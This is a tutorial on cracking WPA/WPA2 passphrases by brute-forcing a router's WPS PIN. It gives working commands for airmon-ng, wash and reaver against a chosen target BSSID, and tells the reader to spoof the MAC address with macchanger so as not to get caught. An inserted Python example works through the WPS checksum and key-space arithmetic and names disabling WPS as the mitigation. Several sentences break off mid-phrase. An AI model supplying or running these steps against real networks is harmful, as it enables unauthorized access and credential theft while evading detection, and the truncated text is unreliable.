Cracking Non-Dictionary WPA/WPA2 Passphrases

A WPA/WPA2 password can be cracked simply by capturing the WPA handshake and then applying a dictionary attack to it. If the passphrase is in the dictionary then the password will be cracked, and this process may take hours, in some cases even days. But what if the password is not in
So here we will learn to crack these passphrases.
WPS: Wi-Fi Protected Setup (WPS; originally Wi-Fi Simple Config) is a computing standard that attempts to allow easy establishment of a secure wireless home network. It is enabled by default on most routers.
Using Reaver we will brute force the AP's WPS, attempting every possible combination in order to guess the AP's 8-digit PIN. Since the PIN is all numeric, there are 10^8 (100,000,000) possible values for any given PIN. However, because the last digit of the PIN is a checksum value that can be calculated from the previous 7 digits, the key space is reduced to 10^7 (10,000,000) possible values.
The key space is reduced even further because the WPS authentication protocol cuts the PIN in half and validates each half individually.
Reaver brute forces the first half of the PIN and then the second half, so the attacker's cost is a sum rather than a product: 10^4 (10,000) candidates for the first half plus 10^3 (1,000) for the second half, whose last digit is the checksum. The entire key space for the WPS PIN can therefore be exhausted in 11,000 attempts. So the key concept is that we can brute-force that PIN and obtain the credentials stored on the Access Point, no matter what the passphrase is made of, whether digits, special symbols or any other combination.
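As an added example, not part of the original article, the Python below computes the WPS PIN checksum digit as the Wi-Fi Simple Configuration specification defines it and tallies the candidate counts under each of the three models described above, confirming the 11,000 figure by enumeration; all PIN values in it are constructed.

```python
# Added example, not from the original article: the WPS PIN checksum rule
# (Wi-Fi Simple Configuration spec) and the key-space arithmetic that takes
# the PIN from 10^8 candidates down to the 11,000 the article cites.
# PIN values used below are constructed for illustration.

def wps_pin_checksum(first_seven: int) -> int:
    """Checksum (8th) digit for a 7-digit PIN body: digits are weighted
    3,1,3,1,... from the right and the checksum makes the sum a multiple
    of 10. An AP rejects PINs failing this check before any crypto runs."""
    accum, pin = 0, first_seven
    while pin:
        accum += 3 * (pin % 10)
        pin //= 10
        accum += pin % 10
        pin //= 10
    return (10 - accum % 10) % 10


def is_valid_wps_pin(pin: str) -> bool:
    """True if pin is exactly 8 digits and ends in the correct checksum."""
    if len(pin) != 8 or not pin.isdigit():
        return False
    return wps_pin_checksum(int(pin[:7])) == int(pin[7])


def wps_pin_keyspace() -> dict:
    """Candidate counts for each model the article walks through:
    naive        - 8 free digits                        -> 10^8
    checksum     - 7 free digits, the 8th is determined -> 10^7
    split_halves - the protocol confirms the first 4 digits and the last 4
                   separately, so the cost is 10^4 plus 10^3 (3 free digits
                   plus checksum), a sum rather than a product."""
    return {"naive": 10 ** 8,
            "checksum": 10 ** 7,
            "split_halves": 10 ** 4 + 10 ** 3}


def count_valid_second_halves(first_half: str) -> int:
    """Enumerate the 10^4 possible second halves for one first half and
    count those forming a checksum-valid PIN; exactly one checksum digit
    fits each 3-digit body, so this confirms the 10^3 term directly."""
    return sum(1 for s in range(10_000)
               if is_valid_wps_pin(f"{first_half}{s:04d}"))


if __name__ == "__main__":
    print(is_valid_wps_pin("12345670"))        # True: checksum digit is 0
    print(is_valid_wps_pin("12345678"))        # False: checksum digit wrong
    print(wps_pin_keyspace()["split_halves"])  # 11000
    print(count_valid_second_halves("1234"))   # 1000
```

The arithmetic does not depend on passphrase strength at all, which is why the effective mitigation is disabling WPS PIN on the access point; a lockout after a handful of failed PIN attempts only slows the search rather than ending it.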
Let's start:
Boot your BackTrack.
First we will change the MAC address of our network card so that we won't get caught:
airmon-ng start wlan0
ifconfig mon0 down
macchanger -m 00:11:22:33:44:55 mon0
ifconfig mon0 up
Now run the following command to get all the available
wash -i mon0
Now choose your target, note its BSSID and issue the following command, replacing <target BSSID> with the target's BSSID:
reaver -i mon0 -b <target BSSID> -vv

Now wait until Reaver brute forces the PIN. Once it's done, you'll have